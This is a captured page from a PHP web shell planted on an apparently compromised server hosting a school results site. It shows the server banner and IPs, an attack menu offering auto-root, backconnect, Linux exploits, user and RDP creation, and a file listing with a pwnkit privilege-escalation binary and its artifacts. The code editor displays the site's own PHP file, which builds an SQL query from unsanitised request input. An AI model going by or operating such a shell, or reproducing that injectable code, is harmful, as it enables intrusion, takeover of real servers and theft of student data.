Linux srv1.sbit.com.bd 5.14.0-503.21.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jan 12 09:45:05 EST 2025 x86_64
Apache
: 192.99.39.68 | : 216.73.216.165
Cant Read [ /etc/named.conf ]
8.2.29
gzmcfenigov
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gzmcfenigov /
public_html /
data /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxrwxrwx
adminloginpanel
[ DIR ]
drwxrwxrwx
admission
[ DIR ]
drwxrwxrwx
cgi-bin
[ DIR ]
drwxrwxrwx
css
[ DIR ]
drwxrwxrwx
db_connect
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
studentsportal
[ DIR ]
drwxrwxrwx
.htaccess
489
B
-rw-rw-rw-
.mad-root
0
B
-rw-r--r--
SHOWAllResult.php
19.52
KB
-rw-rw-rw-
check_compolsary_subject.php
893
B
-rw-rw-rw-
check_grou_name.php
768
B
-rw-rw-rw-
check_optional_subject.php
863
B
-rw-rw-rw-
check_selective_subject.php
878
B
-rw-rw-rw-
index.php
48
B
-rw-rw-rw-
jquery-1.11.3.min.js
91.36
KB
-rw-rw-rw-
logo.png
70.27
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
save_reg_info_1.php
6.82
KB
-rw-rw-rw-
showResult.php
11.59
KB
-rw-rw-rw-
std_info_1.php
36.8
KB
-rw-rw-rw-
stdpic.png
3.48
KB
-rw-rw-rw-
view_students_details.php
12.09
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : check_compolsary_subject.php
<?php error_reporting(0); @session_start(); @date_default_timezone_set('Asia/Dhaka'); require_once("db_connect/config.php"); require_once("db_connect/conect.php"); $db = new database(); @$explode=explode('and',$_REQUEST['className']); @$explodegroup=explode('and',$_REQUEST['groupname']); $select_group="SELECT * FROM `add_subject_info` WHERE `class_id`='$explode[0]' AND `group_id`='$explodegroup[0]' AND `select_subject_type`='CompulsorySubject'"; $chek_query=$db->select_query($select_group); if($chek_query) { while($fetch=$chek_query->fetch_array()) { print "<input type='checkbox' name='subject[]' checked value=".$fetch[0].'codnumber'.$fetch[3]." class='cmsub'>"." "."<span class='text-info' style='font-size:15px;font-weight:bold;'>".$fetch[3]." "."(".$fetch[4].")"."</span>"."<br/>"."</input>"; } } ?>
Close